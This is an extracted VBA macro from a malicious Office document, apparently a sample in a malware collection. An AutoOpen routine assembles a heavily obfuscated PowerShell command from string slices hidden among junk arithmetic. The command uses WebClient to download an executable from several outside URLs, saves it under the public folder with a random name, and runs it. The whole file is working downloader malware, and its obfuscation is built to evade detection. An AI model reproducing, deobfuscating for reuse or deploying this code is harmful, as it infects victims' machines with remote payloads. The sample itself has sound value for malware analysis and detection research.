Filename     : ./macros/4138659b0d9c3db3e94a1defa7274cabd0075efd78025678d813e8b4f424ea4f
OLE stream   : Macros/VBA/mAzhJAqqwZTua
VBA filename : mAzhJAqqwZTua.bas
----------------------------------------
Attribute VB_Name = "mAzhJAqqwZTua"
Sub AutoOpen()
On Error Resume Next
chGPGNWBF = (1789645 * mitLljnL * 283909 - uVQRzVoIidTd) + FinfWCqNkVBHrw + Sqr(pjz) * (GjiMqwIsi / 8760940)
WjGJmodwB = (3263042 * KbKAO * 1791334 - YlTC) + qWPXVzjOKI + Sqr(NovwFIZ) * (fjTwEYMbpCUw / 5088547)
UAPmWRHBU = (530169 * BHwLSKAQLcWzWa * 2156340 - JVrLqMttofMiqS) + KdUuwbBIiBEk + Sqr(zBsMLSwfdqJpNC) * (nwSZtnMV / 480383)
Application.Run "VmllTZHjYaiSn", HiriLapqWEzCod
fOXIMNKmb = (9170484 * nnzWYUJjmLFjZi * 4171970 - jirKkfqjzv) + TQjXOSGjzwvB + Sqr(dfirafwd) * (jaHjkLHzTZdi / 8117537)
QFoqQSvWh = (7802846 * RhEzwGSwM * 5433363 - GPihubCfVXv) + OcDjOfhUzldS + Sqr(GKw) * (HjRNhz / 4710603)
End Sub
Function HiriLapqWEzCod()
On Error Resume Next
dwGTRajHhuQ = (9625630 * TvST * 8112317 - WEnQKO) + CwWXJTSqawZs + Sqr(bVBXfJUSpI) * (fjpzjCGs / 384982)
EpiOsCCRAV = (2460198 * LqAajfNszt * 5105561 - nADPk) + uXM + Sqr(AsciTHYpjqTu) * (KWEap / 917548)
VIAdd = (9484433 * cEWBw * 6046093 - VsHoUXpIzFL) + TJMj + Sqr(sqtsjaFTPiYn) * (cVbl / 3775827)
iPqzFVS = IEowWDVopX + Mid(QDj + "ojTJtwYpqYS+OFl+OFl0yb-OFl+u7W+u7WOFlou7W+u7Wbj'+'ectOFl+OFl0yOFl+O'+'Flz1b+z1bb)'+' SystemOFl+'+'OFl.Net.WOFl+OFu7W+u7WlebClOFz1b+zu7W'+'+u7W1bl+OFlienOFl+OF'+'lt;7hONSB = OFl+OFl'+'7h'+'OnjmzoUDiGTPwEhZaEFjZmN" + MYkC, 12, 179)
fVPvA = (3406676 * rcqiiqY * 132169 - TDYiZ) + bVmf + Sqr(SbTM) * (rdWjIVtDuPsn / 3671682)
ksLOZDMwu = (8993686 * rUTpE * 2730200 - QMaASN) + BPJdp + Sqr(MBTDwKUkJMnB) * (WRwIdHbbNJGH / 448131)
nOEVFBnYjjB = (6116640 * sziKdDwpAPrut * 5994769 - Amwb) + rCHfVOPwrNwv + Sqr(arKddYnZbw) * (lNhwGJTIaoCpr / 568945)
nqqRfj = jiZmUOGVdwdzP + Mid(fIImupR + "rqddbu7W+u7WOFlSDC);bOFl+OFlreak;}u7W+u7WOFl+OFlcatchOFl+OFl{}}OFl)-cREPLACe([chaR]111+[chaR]70+[chaR]68),[c'+'haR]92  -REPLAcE ([c'+'haR]110+[chaz1b+z1bR]102RZTNJKCCYsiTbwTO" + VEt, 5, 154)
lEnaqwhQhYp = (5817224 * apzPJ * 2014000 - JinXmldIjiV) + Orfb + Sqr(tliwUQnq) * (soEJQJhvkEh / 3636104)
zjlfFzB = (7393907 * pRIaiV * 2946597 - uOYWYjq) + RzhAtoEWRLYS + Sqr(btGH) * (piLqIUW / 4626760)
IjrJY = (8930701 * lulBFvmhllXA * 2645270 - ITwwNSURODr) + dbqMi + Sqr(uOkXZXN) * (oMUVz / 7805651)
qSlMzimwU = PnwzmTvPSnwWJ + Mid(nRQEOuHjS + "NRdpLDjCZEW+OFlenu7W+u7WtroinfOFl+OFlisz1b+z1u7W+u7Wbsi.ez1b+z1bu/XO'+'Fl+OFlgxk/OFl+OFl?http:/OFl+OFl/OFl+OFlteu7W+'+'u7Wz1b+z1bcnopiOFl+OFla.org/TOFl+OFu'+'7W+u7Wl'+'o1OFl+OFlyEaTYFWqIvmiAzkUdLFwXrwqihi" + iunUpYCSapJzb, 12, 167)
UdohChlZb = (8823919 * oDK * 3550579 - QrrNUudVvNuiQ) + vvzrJzMX + Sqr(cHzNRolDsnG) * (tCKOGBnBjLU / 5981754)
WaQDjzqiN = (5818229 * GoMAVjtFPGXhLj * 1936671 - CuKpC) + odDwZWFQmRjTi + Sqr(rrSZqomEqYpGrX) * (aUov / 2494687)
KkhtrwVXdMI = (9918734 * wYHXAwTFwrz * 2534498 - LbkzOGk) + iGSfhIMzuXV + Sqr(HutSTnoklawJdF) * (wkphGOzSSosSpG / 1600641)
CMiCpwPSqm = ahpYaKbVU + Mid(iJtRLqZHCG + "Z+'+[chaR]103u7W+u7W),[chaR]96-cREPLACu7W+u7W'+'e'+'  OFl0'+'u7W+u7WybOFl,[chaR]39-'+'cREPLAC'+'e ([chaR]55+[chaR]104+z1b+z1b[chaR]79),[chaR]36-cREPLAz1b+z1bCe OFlIbGOFl,[chaR]34uBjjSrPuBwlj" + AltYiBiIwtGCvD, 2, 177)
pkwOS = (5460347 * daUwdcWih * 2714863 - jRSJHoOwOKfrq) + svwdMhAoFo + Sqr(GTWY) * (icmhfwvwja / 3743739)
pvbNFkWPbnU = (2669922 * RwjiTl * 6477696 - AUjvrLdD) + VsY + Sqr(jCEJzwACum) * (maopVb / 9940551)
siPvRDLjnYZ = (7084602 * IdHGmnkRsiFa * 8025872 - kvfVUohWFi) + IRWohZV + Sqr(hYCu) * (WLLjJMjnwsDtqG / 5959948)
wOYzvI = TbPKQhR + Mid(aRzBEIJBcL + "pbGs/?OFl+OFlhtOFl+OFltp:/OFl+OFl/spOFl+OFl'+'orOFl+OFl'+'tfishing.vip/z1b+z'+'1b'+'tOFl+OFl9u7W+u7WI0fu7W+u7W/?http:/z1b+z1b/OFu7W+u7Wl+OFljaOFl+OFlvi'+'yale.comhRmJzn" + NFqPiK, 5, 158)
CVnPDLRJ = (8406148 * qMYliVK * 8735623 - zGzDwUojVsII) + SKZiYIQv + Sqr(hSqtGjXDfXFSj) * (NpEKYpzBiKUtO / 2366982)
wbMRkbK = (9962163 * BcuBYjNDOEMSNl * 563144 - mSM) + TwsFwfjfZMVK + Sqr(iVc) * (iSjbBvTd / 5893665)
WOXRCcBSUL = (7843182 * HPHvAJdDjoDtwi * 5734565 - jBO) + QajIzfOSCZ + Sqr(TqmXJFaKt) * (Rsia / 4965775)
iIawjXacSS = ImXZndVOcKIjSI + Mid(iAhwI + "fnCNYkUfloKbTLnfiABaKRl 7hOFl+OFlONSBOFl+OFu7W+u7Wl + OFl'+'+OFl(OFl+OFl0yb.ex0OFl'+'+OFlyb+0ybOFl+OFle0'+'yb)OFl+OFl;foreach(7hOFl+OFlO'+'aOFl+OFlsfOFl+OFlc u7DRbKzrKUmKI" + wMsBfMZSu, 23, 138)
XqzsowXLwT = (4044319 * zhwhavVv * 1658500 - ADjFqaHiqwvQ) + VqXaiDzalu + Sqr(hzkQVZZPsUM) * (VDUtoiAWdi / 9841641)
ZVcNuj = (5508444 * CUnrKPOIvYqqq * 1825640 - ZfXNJK) + WNJ + Sqr(wlYHw) * (HZS / 920299)
RhCrq = (7190948 * hFwXafdD * 9757896 - jwwLlTh) + wai + Sqr(Tdk) * (ZqiQqLoHpILm / 5369764)
qmIWvEODfFL = sXtjcPKjhiwv + Mid(vKBKMkC + "wUhwcb(' . ( vbcenv:CoMspEc[4,26,25]-joinu7Wu7W) ((u7W . ( kuHEnV:pubLIc[13]+kuHENV:PUbLIC[5]+z1bxz1b) ((z1b & ((GET-vaRiAbLE OFl*M'+'dr*OFl).naME[3,11,2]-JoinOF'+'lOFIkTdLc" + KUvJq, 7, 161)
ziHfqTET = (8995800 * HqcrsbIi * 7343464 - tZXFcSJWq) + pkwkcwdSSRmhwu + Sqr(VMoutdITMbIGSj) * (MGQujWts / 2896869)
ozbmwTu = (9107928 * qLUoMcdGHGUbzV * 6326090 - jJTpLm) + FfQCLbbTZwvnw + Sqr(YOjdLYQriTYCGK) * (vFmDQOIwaRf / 6200525)
AEuRjwtHNj = (7478256 * dBikRKunMzNiO * 222414 - dJVQkitIkjkQSG) + jsdwB + Sqr(qRoAoHs) * (pmAHAzIJPCQj / 8630034)
AzvJk = jFKbBbJnPorSG + Mid(pjmUm + "mjojMsLTnJKopFltem0yb)Ou7W+u7WFl+u7W+u7WOFl(7hOOFl+z1b+z1BdTqXljoG" + GnVhiXIqVcH, 14, 44)
tcnccsqScH = (3484920 * sOHFMasU * 3850928 - iHWKQczGtiX) + Jzl + Sqr(YwwtY) * (hEtdZKjwIBa / 1628331)
MshkplOvL = (188924 * vwn * 8875280 - VljBoEKUB) + vYa + Sqr(waRQnD) * (XzaWdBwkPaJB / 3077434)
XhijhHLj = (650274 * wCF * 4815899 - phuMdz) + EaihzqnwoIfKD + Sqr(jmbmWK) * (vcOLO / 7833155)
LYiwiuMSL = DjuchASVARzimr + Mid(QvWAVuujIR + "oru7W+OFu7W+u7W'+'l7hOYYU.IbGDoOFl+OFlnOFl+OFlfgWnlnfgOadFIOFl+OFlnfgl'+'eIbOFl+OFlG'+'(7OFl+OFlhOasfc.OFl+OFlIOFl+OFlbOFl+OFlGTOFu7W+u7Wl+OFloStrn'+'fgz1b+z1bOFl+OrDSvvYVzSOKRQiYZYoYWj" + DWcbf, 3, 162)
QqKbDnF = (7204725 * mjzWZBjcKiEim * 8305967 - sotujo) + pUhLVWXJnwb + Sqr(kNYdjtjzvFhbMY) * (tNvN / 379257)
aLabnoiij = (1079706 * qdo * 2717841 - NEBuHGqGDT) + MBzqq + Sqr(mGzwQivsjZq) * (WvoSMWsuKZV / 4227782)
uifoMC = (3449266 * ZDi * 2273000 - PJG) + iOjwaFCYjzWj + Sqr(VuoczwZN) * (diOEsKXXbaQ / 906790)
lPNSvuP = pCOtiFrKlsJLcF + Mid(pXuVAG + "UaDwRfiitRf MbRFuDvisiLMONXsEdDCJMIpklu7W+u7W) ( ((OFl7hOFl+OFlOnsadasd = &OFl+u7W+u7WOFl(OFl+OFl0ybn0yb+0z1bu7W+u7W+z1bybeOFl+OFl0yOFl+O'+'FlbOFl+OFl+0OFl+OFlyOFl+OFlbw-obOFlu7Wzj" + TaGolJwPWlBoI, 38, 141)
ajdQSuanA = (2181529 * fIR * 2444248 - HjsDKXAzJNibIS) + swaQziwA + Sqr(hSwL) * (mFPQAdVq / 3570775)
ziJNdu = (617513 * BLOhhsG * 4721652 - KihANRIimWr) + obXITLIoE + Sqr(dXv) * (TjTYoMXZLDXPCi / 3993488)
hVzTI = (7456308 * wLu * 2370451 - qYOjwjiIFJF) + wZPNhf + Sqr(PPT) * (DIZURzhLBlj / 8630100)
iKzvviiY = DdaSoIA + Mid(WvWBhnWZRNhd + "u[chaR]122+[chaR]49+[ch'+'aR]98'+'),[StriNG]['+'chaR]39)) ').replaCe(([chaR]117+[chaR]55+[chaR]87),[sTRINg][chaR]39).replaCe(([chaR]118+[chaR]98+[chaR]99),[sTRINg][chaR]36) djYrXFaZRbJR" + kEiWNrBJYvQTPr, 2, 172)
PZlKDzWKLI = (4532842 * DdPjUCZQPXMVXu * 4050014 - YtHTfKoOVGAj) + YasaPFKVPCno + Sqr(bZIBQQ) * (jrX / 623645)
VvluwVHzhw = (823632 * toAKOCq * 5286597 - zTuHoLTJqUiQ) + PFUqkjFhDpW + Sqr(MVUEokwnlbpGIb) * (QhjjZCKZvpXSJ / 4237597)
QFihYRzLPO = (1778537 * iYKbpzEBjjczn * 3165669 - hIopzX) + wuBw + Sqr(PRSoRbiK) * (wACQdizsaM / 7151122)
dSrsTDzImiY = KHOnrDwNJnkvXq + Mid(jqzUWn + "rj+OFlDT/?http://wiOFl+OFlz1b+z1btocarsOFl+OFl.HoXWpGHcMGqVWF" + YYPQK, 3, 45)
tXkjhi = (7600857 * ISlSLlGia * 1732620 - otiAQrfYvHBj) + ndSX + Sqr(kihBKHZYDtUaB) * (cjhzXDEzfU / 8553431)
cAIbzBPia = (3768669 * jdii * 3775435 - mpaImjabrn) + EUFTHYFiuUr + Sqr(CMJqAqvYLAs) * (sCbvPw / 5287180)
ZYHzn = (2519830 * tPXNo * 5387805 - ZEYN) + CXvdsalvOaEcr + Sqr(EzKOwticJ) * (lcMOqzHbiTpifR / 4420296)
wcIlp = bqJVjJWYbPZ + Mid(apkQsKVFFjjIl + "qIwJDzmmtKIjrBJmV'+'+u7W+OFljeOFl+OFlc0yb+0ybt0ybOFl'+'+OFl)OFl+OFz1b+z1bl randoz1b+z1bOFl+OFlm;7hOYYU ='+' .(OFz1b+z1bl+OFl0OFl'+BRSETatXO" + WsGDUoLt, 18, 113)
lrLGvFRILjP = (8350863 * CMjqlqGwr * 6859326 - RBJCPPjZHHS) + hziwwd + Sqr(pVwzREuYNCJQjU) * (BaoVULlTk / 4112466)
YikarRB = (6923029 * wqCtIUuuPTErwV * 8201745 - XzrmsEw) + IcIk + Sqr(CNb) * (EviLJAvlaO / 6584354)
bnWDlNMtNz = (4292632 * XzUTvmizHurukf * 2415337 - rMFcK) + ZIHOzvBSpQlLF + Sqr(QjGb) * (kzBqQYUibiBctm / 5736787)
KFQPfRNKQ = qRwTLvWNXH + Mid(paUQaO + "EbFl+OFlnz1b+z1bOFl+OFlv:OFl+OFlpublOFl+OFlicOFl+wqTjDTzYTJJIoTCI" + sPOXEOTcwYkaSs, 2, 48)
jiPIWiXqwpW = (7554683 * YbiDXZlPpIzOH * 9753527 - ihbvwONhCvVrN) + UGQoRBw + Sqr(qjjsPjn) * (CjrhitHso / 5653806)
zaYjWJ = (2129691 * fIChYuUCjapzv * 1756996 - rOGwducslAfm) + wXznqFqij + Sqr(TVPltcttmZCPdi) * (hzDPRhtItD / 1720701)
kocmlvC = (5059092 * HpT * 1670654 - PmdOJ) + QrGsNYiuRJ + Sqr(GmSP) * (ZMVhkCs / 7319220)
kmJQrl = MMhpivpEbJZ + Mid(DtHFifZvX + "no'OFlRoEivuwjwzIGijwDp" + qpcNajo, 3, 4)
WzXiaWl = (6021524 * jWIoQSTpr * 4762793 - BMWtzmM) + DIQijaNWl + Sqr(FFopqhmjK) * (OXGFowr / 2970045)
HYwiKF = (5317326 * zhijbVP * 7717861 - NCvhOmTi) + VoHQc + Sqr(LjCLtkjwvQbXW) * (NVSw / 1951413)
ChDnca = (9304028 * SpsTUU * 6000347 - nNjFpUvSEuoiE) + QmOzWwzWIFjdtr + Sqr(sZPEE) * (DrSj / 7416504)
NjZbI = GtENvATpUzaaBu + Mid(UOIszjj + "FJbtYVtUrivFvrXhFEZWZkWruOFl +OFl+OF'+'l'+' OFl+OFl0yboFDz1b+z1b0OFl+Ou7W+u7WFlybOFl+OFl +OFl+OFWjsXHST" + vzNQsbzNzUvG, 26, 71)
QntqVMHpc = (1665779 * VYZzs * 2518368 - vQkjwIEkOQZSE) + BRXKqwOtUKOu + Sqr(iws) * (aLKJGN / 18069)
cXsZZprEY = (9546432 * AtLvB * 7324378 - YTG) + pBO + Sqr(CwZSCGWnVD) * (GuivDXMhwVhYJb / 8150512)
OYiwT = (5563317 * pqYZzd * 1286971 - ohvCd) + psCf + Sqr(uXCic) * (PMUXQqL / 5747081)
wbiMSuqF = DNDVSMTYF + Mid(Xwju + "rSGqzEOGpSOFl+OFlpOFl+OFllz1b+z1bitOFl+OF'+'l(0yb?0OFl+u'+'7W+u7WOFlyb);7OFl+OFlhOSDC = 7hOeOz1b+z1AfFApSO" + EdZMbE, 10, 90)
nvPOBliKpz = (3283594 * mYrjYWHJNdX * 8568120 - mnoLouwb) + JufvPKTiTbAl + Sqr(rwhHwHiScZoLFz) * (kRmUKwOw / 916612)
RqDBjZzJQ = (5541671 * wpiJ * 9174515 - lnwpdjwotYjVr) + KLvwCofbCcB + Sqr(irKsnTdva) * (CiHlpfR / 4560316)
YrDzYWt = (6451267 * NtwlujHGM * 1960688 - TnBBEdAkNrv) + sINrQ + Sqr(zKivaOlvZwHLWi) * (hivFjl / 360172)
HhfOMutqV = zfiZIRXl + Mid(qRfUPs + "fuUoW+u7WiMbWXwTmrUQkFBBN" + GwjirmLvFh, 5, 6)
RlWaR = (2226262 * RlhNztrb * 8161738 - BswRRVOVQbJiTS) + zPKSOFqrD + Sqr(EJuPGN) * (WpOQIjLjHqckPj / 3394020)
wBHhu = (2827728 * AdhIcqKAsCN * 2297707 - GJNLLdE) + ofwlH + Sqr(NHnfmu) * (Ocjpu / 9883235)
fLAuYAoKT = (842078 * PjwUnk * 3794732 - DYoKZMwj) + UbwtFXaR + Sqr(sjhWQ) * (zwZwAQUiu / 7114990)
ACoMzn = nUjSkDdjp + Mid(INAFYNmQIEBd + "opAiXUzvajsOFl+Ou7W+u7WFladOFl+OFlasd.nexOFl+OFlt(1000OFl+OFl0OFl+OFl, 282OFl+OFl133);7'+'h'+'OADCX =OFz1b+z1b'+'l+OFl OFl+OFl0yb OFl+OFl OFl+OFlhttpOF'+'l+OFl:/OFl+OFl/OFl+O'+'FlcOFlwPRTwFfh" + VMt, 11, 173)
FIjmBCdP = (438916 * WRbh * 5368492 - BjErGrZPpcNs) + GvCzoYFPfOL + Sqr(bFOnsvVA) * (lFc / 3172131)
rlSQvzcHMK = (693074 * DXJGsIK * 9116933 - TRnJW) + WVtSfmLbz + Sqr(sskVqailFB) * (VHSQQKBUaIMdc / 2880993)
XzJEtDvUpK = (6883605 * wYhrwLZAQZa * 4332341 - jBDUhBNaBOcKH) + XfOIGGrk + Sqr(YKwJi) * (ArkiaqG / 1616605)
zIpjup = GwjjCizRZXHW + Mid(JXDbs + "VcwhciawnOVLYcOFl+Oz1b+z1bFlpl/AxdCA/0u7W+u7Wyb.lWRSiSDbFw" + phHJLdmziGAw, 15, 34)
JCjTKcBkX = (952961 * skjnCT * 5565317 - Vfww) + QOYrRczI + Sqr(qwvmMBIH) * (zwEbfTLmLhi / 4293419)
RYSYwJjAi = (9985674 * DzbRI * 7922179 - uFFWtksPGbwNuz) + Voi + Sqr(jfRS) * (zqmsokkzS / 7359161)
CnToZzrHqz = (527017 * wFliTWFFfIFN * 285853 - niDJTdnbW) + wzb + Sqr(rzvIwKW) * (wWMILMzrkZq / 2325210)
hXbiqPtBwmz = uNWHwKEh + Mid(oCUBRTQCzpfK + "bjzYGbSONunuctFlgNu7W+u7'+'WgIbGOFl+OFl()'+',OFlz1b'+'+z1b+OFl 7hOSu7W+u7W'+'OFl+OFlDC);&Oz1b+z1bFlz1b+z1'+'b+OFl(0ybInvoOFl+Oz1b+z1bFl0'+'ybOFz1b+z1bl+OFl+0OFl+OFlybk0yOFl+OFlbOFl+OFl+0'+'ybe-IOFl+OkiTiz" + rfJBXsfjjQX, 15, 185)
FcILpJMNcv = (4553081 * CmpXGwAOmtNb * 9580642 - inIzFu) + PMHHdt + Sqr(PKK) * (MZdaHslHCX / 8961991)
UYlwd = (584526 * qcMAfQJJdYnZiQ * 5585335 - wwbi) + PYnEfQOzrt + Sqr(JJQAhDk) * (AWiBqAZcICGYS / 3862155)
iocPz = (3136679 * EZwzAvLmi * 3693749 - YzcYsO) + iKjWzDGnGv + Sqr(VBptpvHHltF) * (wWWkB / 5542764)
XWORiWhZ = CwJSZDXiijTvjO + Mid(MzQrGDlhwL + "OJoncmEbzsuWscMji|iNVoKe-eXPresSionTmuDpq" + adiSZJP, 18, 18)
IVvBLTv = (6871679 * aSF * 2107571 - QXKRDnvNj) + sjRuvM + Sqr(KWTz) * (chwJGK / 6522480)
zaqiicn = (260686 * nBNAdzAWr * 2771144 - kWkHLEn) + VIjrdCvdVujk + Sqr(ioEfDuSNFn) * (EdiFwowCWu / 6215550)
rdmjmOcj = (3464227 * Jjzh * 4206212 - cKdpFhjcHK) + ZPUEnAXq + Sqr(jwiNkwWzVU) * (kraLUanYXQLqrB / 3958455)
wEvPW = iNKklFuibst + Mid(oQBJR + "X'tsTiqFtaCmcjNIs" + iJhQlcocz, 2, 1)
icCkcKm = (6485882 * zwlWsCbf * 7966408 - jRMkD) + iPm + Sqr(pRKWbZada) * (DoZmhJCrsfNct / 316698)
fWXTRHwVHnj = (5714058 * FiRCIwdGjh * 7693166 - uTbwFz) + usaD + Sqr(AmXGNMXIsuTvM) * (jGKSDzVn / 9334772)
wFUiRtW = (4897355 * PXw * 8932961 - ofbWCWZWsWK) + WzzjmhNAkZ + Sqr(EZNqzCwo) * (OJGnUqVNh / 7682341)
JOwLa = zAWiarpwj + Mid(QEHLjHnNlh + "UCOATXzwW'+OFlybnez1b+z1b0OFl+OFlybOFl+Ou7W+u7WFl+0ybz1bu7W+'+'uXCcBnZSGjrjRszpZVfzYbmTD" + IjMMwSPVFnMQ, 10, 55)
KvznzSzjF = (3670616 * AqPjwtXiVwrUKs * 5964983 - thhFTfwFZDDOMj) + iaCOSINrmD + Sqr(ZjrwCAjOCiSN) * (UrJKtqJSo / 3695781)
YjLjc = (1799270 * IiMpjpvCiGPOc * 126657 - hzi) + PNa + Sqr(bwCwvuWkQiDuW) * (ZWoXLzO / 5344719)
kuStwwYc = (9071660 * tnbVKStfik * 7201204 - drzHHVzjZGjN) + HLsCcizD + Sqr(FHSBazo) * (MlijszXD / 8134922)
QDSAblKrz = jppQwZXdqi + Mid(wOIXwofbUuhjQ + "fEnw/5z1b+z1bLOFl+OFl'+'LbdOu7W'+'+u7Wz1b+z1bu7W+u7WFlNioZpvhwcmtnLqonpzwh" + tLLwLA, 5, 50)
cKwsXwOdSi = (902641 * Yrm * 8900039 - fwwj) + fOkwa + Sqr(HsNiJnsj) * (TTPwwTskC / 4371555)
uEvdrlkX = (2008818 * HoOi * 8454453 - CpkBnwRDZm) + tkzGPmLh + Sqr(krndhbPSAEwARH) * (rtSjShvtFOJl / 2131068)
ODZABiJQTjE = (9744503 * BCBuvLBHUMjz * 474273 - nVbdKOW) + fOQpzhO + Sqr(pETJCwwX) * (dpmzT / 7232742)
NLEjksSl = cOJmHNwCGBdFF + Mid(nJmspGuBrBu + "DDmzEsFICYHzvpXowTTstlqsLUX'+'7W+z1bw0ybOFl+'+Zjlzzbkt" + foPOUzllXoKSz, 28, 19)
wYLHHVU = (4435990 * diwZO * 4257312 - hDjpVZMtGQVt) + wJBAFbViqULjKK + Sqr(vJoGW) * (pXwD / 9571384)
qikwRMUpwLj = (3420489 * KLQDq * 4471957 - ThwUnA) + qjYFK + Sqr(DzwcPX) * (HlEwHJLTfEHtn / 9059261)
SzjIsfq = (7953358 * NTSVwz * 7791599 - wmDHNPoo) + fIicAMd + Sqr(rLfQMXTNiiIw) * (uHz / 6157392)
ZNqHjthOc = sYSsiIAkUhWm + Mid(GNUszWbjs + "ranOFl+OFl 7hz'+'1b+z'+'u7W+u7W1bu7W+u7WOFl+OFl'+'OADCXOF'+'l+OFl){OFl+OFltOFl+OFlryOFl+OFl{OFlu7W+zOVizIJiXLOh" + rXDRjYk, 3, 97)
JPjMO = (7409460 * jGwVAG * 4046472 - TnYKFXKbjjZH) + mWqKPSuT + Sqr(uJAzCmiKflwvj) * (YsmzbKLfYitukG / 2146076)
llBRirKJOOp = (7251056 * aVatOKGUXtZE * 7680138 - bFZRS) + STJhPlVFH + Sqr(bzt) * (WZFDJijiDRmakU / 3414816)
jwJzL = (7865741 * otJVG * 2409219 - idpANVRZKqnCA) + IjvnQsvo + Sqr(BoS) * (nGkcQMMZftjRi / 9958201)
cVULqZp = UGDGQQSZHmHmNH + Mid(jFnJHmPjtijj + "XBLFBoRWwzGCoEiWMbciQzFlinfOFl+OzJzNl" + RkAkwCsWlluPw, 23, 10)
TaZzK = (8262171 * WhsjZG * 3979051 - iDHzWuas) + kDFTXF + Sqr(tojIaAsD) * (wLIbOPW / 3710524)
fQuTuAmlTzi = (7682001 * aWVETz * 9335303 - MZlvwcWp) + aLzdKDfXjRQ + Sqr(Ujl) * (HizYkMLdcf / 5831256)
ROLlMzUFGzm = (6202053 * MfF * 4749172 - wHqmPSqjkf) + XstAPrzXQA + Sqr(ATBiZw) * (WmLcoki / 8057406)
iuEfTPOUX = PujPoojJ + Mid(hqUzpc + "ShTzDfLpFcGz1b+z1b) ) z1b).u7W+u7WREPLA'+'ce(z1bOFlz1b,[STrin'+'g]'+'[ChAR'+']39) ) u7W).REPlace(u7WkuHu7W,u7Wvbcu7W).RE'+'Place((ljCBfMYTsXBZ" + MuddSaOXpnwc, 12, 119)
HiriLapqWEzCod = nHmIijL + PjiDcfwFnl + wZELIjvSGtQCVz + ChrW(34) + nVhhHiiGWlk + qmIWvEODfFL + lPNSvuP + wcIlp + JOwLa + NLEjksSl + kmJQrl + iPqzFVS + ACoMzn + qSlMzimwU + wOYzvI + QDSAblKrz + dSrsTDzImiY + zIpjup + wbiMSuqF + KFQPfRNKQ + NjZbI + iIawjXacSS + HhfOMutqV + ZNqHjthOc + LYiwiuMSL + cVULqZp + hXbiqPtBwmz + AzvJk + nqqRfj + wEvPW + CMiCpwPSqm + iuEfTPOUX + iKzvviiY + XWORiWhZ
trMNtUuDI = (4200417 * WiqizlUV * 9235612 - nSjAEdUJBXTj) + mqqOmiKkcK + Sqr(zzrYhw) * (AptFYfMpqZt / 1411765)
wFmEEsGXi = (8407018 * HLISBEmwcEl * 3722556 - kjSLBwnkqVLIM) + mjbZEIDmuPNLk + Sqr(dRC) * (msTXZv / 4088534)
lEAQqwKoJ = (9971296 * AfhKqw * 7471048 - wqM) + HYSwVUcPHjE + Sqr(EDVDSCW) * (EOQXjbCVk / 4454867)
End Function
